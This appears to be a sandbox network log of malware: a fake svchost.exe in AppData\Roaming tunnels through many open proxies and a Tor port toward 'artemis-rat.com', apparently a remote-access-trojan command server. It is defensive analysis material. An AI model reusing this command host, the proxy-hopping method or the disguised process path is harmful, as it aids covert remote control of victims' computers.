Mar 9, 2024 13:14:29.877688885 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2350	192.168.2.5	57487	43.163.192.3	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.883649111 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2351	192.168.2.5	56972	184.170.249.65	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.885783911 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2352	192.168.2.5	57419	187.40.1.123	128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.886563063 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.234312057 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:31.197314978 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2353	192.168.2.5	57653	104.21.6.88	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.892227888 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.046390057 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2354	192.168.2.5	57525	35.72.118.126	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.893320084 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.160758972 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:30 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:30.197535038 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a4 0f bd 1a 28 76 be 12 75 f3 2a be a9 83 3c 91 32 03 7e e3 3f 48 c1 4a 76 03 6e 0d 4b 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eR(vu<2~?HJvnK,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:30.483139038 CET	1079	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 4c fb c9 57 60 6d 73 2f e6 58 d5 bb de e9 df 63 d1 f3 71 7a 47 4e f7 09 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9LW`ms/XcqzGNDOWNGRD0000H010Uartemis-rat.com0240309120120Z260309120120Z010Uartemis-rat.com0"0H0LU,m-YLa
Mar 9, 2024 13:14:30.532196045 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 d7 0a 5b 4b 6a 6d 93 d7 7e ea cf 7c 6c dd af b2 59 c6 3e 52 37 dd a8 69 6b 84 d8 af 1a b6 80 20 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 48 d9 27 67 d0 62 61 5c 14 46 97 92 82 7e ac 34 ce 94 9b a1 36 Data Ascii: %! [Kjm~\|lY>R7ik (H'gba\F~46?$
Mar 9, 2024 13:14:30.815906048 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 b7 16 22 a8 59 db ed 83 0a d9 5d 06 c4 f4 83 2b 1b a5 8f 79 80 1e 98 fb 9f cc 83 c6 a3 dc ce ea b1 58 57 f9 12 0d 81 0b Data Ascii: ("Y]+yXW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2355	192.168.2.5	57413	212.108.155.205	9090	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.903359890 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2356	192.168.2.5	57363	43.231.22.229	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.903487921 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.320318937 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2357	192.168.2.5	56401	37.18.73.60	5566	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.907334089 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.264393091 CET	729	IN	HTTP/1.0 501 Tor is not an HTTP Proxy Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00 Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2358	192.168.2.5	57511	82.113.157.122	31280	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.912766933 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2359	192.168.2.5	57685	104.16.213.202	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.913341999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.073498964 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2360	192.168.2.5	57686	172.67.181.51	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.914108038 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.068386078 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2361	192.168.2.5	57482	212.79.107.116	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.914396048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2362	192.168.2.5	57498	154.12.178.107	29985	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.918920040 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2363	192.168.2.5	57504	47.243.114.192	8180	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.919013977 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2364	192.168.2.5	57705	162.159.247.57	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.931221962 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.092458963 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2365	192.168.2.5	57529	121.128.194.154	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.934180975 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2366	192.168.2.5	57733	172.67.182.48	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.941833973 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.098494053 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2367	192.168.2.5	57392	90.188.250.16	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.943708897 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2368	192.168.2.5	56617	54.38.176.200	26591	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.954502106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.145993948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.942884922 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2369	192.168.2.5	57497	31.44.82.2	38080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.954550028 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.833126068 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.942877054 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.146213055 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.333832026 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2370	192.168.2.5	57547	84.39.112.144	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.954634905 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2371	192.168.2.5	57501	8.219.228.100	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.962769032 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2372	192.168.2.5	57581	211.222.252.187	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.963926077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2373	192.168.2.5	57568	8.218.231.62	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.976150990 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2374	192.168.2.5	57595	16.162.211.90	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.979568005 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2375	192.168.2.5	57552	210.4.194.196	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.985683918 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2376	192.168.2.5	57713	129.213.150.205	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.993226051 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2377	192.168.2.5	57599	128.199.187.208	8000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
